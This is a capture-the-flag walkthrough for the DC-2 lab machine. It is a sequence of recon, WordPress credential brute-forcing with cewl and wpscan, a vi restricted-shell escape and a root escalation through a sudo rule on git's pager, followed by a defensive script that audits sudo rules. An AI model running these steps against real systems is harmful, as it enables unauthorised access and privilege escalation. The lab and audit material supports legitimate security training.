DC-2 (Walkthrough)

netdiscover -i vboxnet1
nmap -v -sT -p- 192.168.57.106
nmap -v -A -sT -p- 192.168.57.106
PORT     STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:05:C7:56 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.001 days (since Fri Feb 21 10:46:09 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
cewl http://dc-2 > pass.txt
wpscan --url dc-2 -e u
wpscan -U admin,jerry,tom --url dc-2 -P pass.txt
ssh tom@192.168.57.106 -p 7744
tom@DC-2:~$ ls -la usr/bin
tom@DC-2:~$ vi
> :set shell=/bin/bash
> :shell
tom@DC-2:~$ export PATH=/bin:/usr/bin/
tom@DC-2:~$ cat flag3.txt
tom@DC-2:~$ su jerry
jerry@DC-2:/home/tom$ sudo -l
cat flag4.txt 
jerry@DC-2:~$ sudo git -p --help
> !/bin/bash
root@DC-2:/home/jerry# id
root@DC-2:/home/jerry# cd; ls
root@DC-2:~# cat final-flag.txt
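
Defender's view of the last step, as an added example that is not part of the original walkthrough: the jump from jerry to root works because a sudo rule grants git, whose pager accepts `!/bin/bash`. The script below audits `sudo -l` output for rules of that kind; the sample listing is constructed, and `audit_sudo_listing`, `SHELL_CAPABLE` and `SAMPLE` are names chosen for this example. Rules carrying the sudoers NOEXEC tag are skipped because that tag stops the binary from executing further programs.

```python
import os
import re

# Binaries this walkthrough shows handing out a shell: vi (":shell") and
# git (the pager opened by "git -p --help"). Extend the set for your estate.
SHELL_CAPABLE = {"git", "vi"}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

# Constructed sample, not captured from the DC-2 machine.
SAMPLE = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /bin/systemctl status apache2
"""

def audit_sudo_listing(listing):
    """Return one finding per sudo rule that can lead to a shell as runas."""
    findings = []
    for line in listing.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults entries, headers, blank lines
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            parts = cmd.split()
            if not parts:
                continue
            path = parts[0]
            if path == "ALL":
                reason = "unrestricted command set"
            elif os.path.basename(path) in SHELL_CAPABLE and "NOEXEC" not in tags:
                reason = "binary can start a shell and rule lacks NOEXEC"
            else:
                continue
            findings.append({"runas": m["runas"], "command": path,
                             "nopasswd": "NOPASSWD" in tags, "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print(finding)
```

Feed it the output of `sudo -l -U <user>` collected per account; any finding is a rule to remove or replace with a wrapper that takes no user-controlled options.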
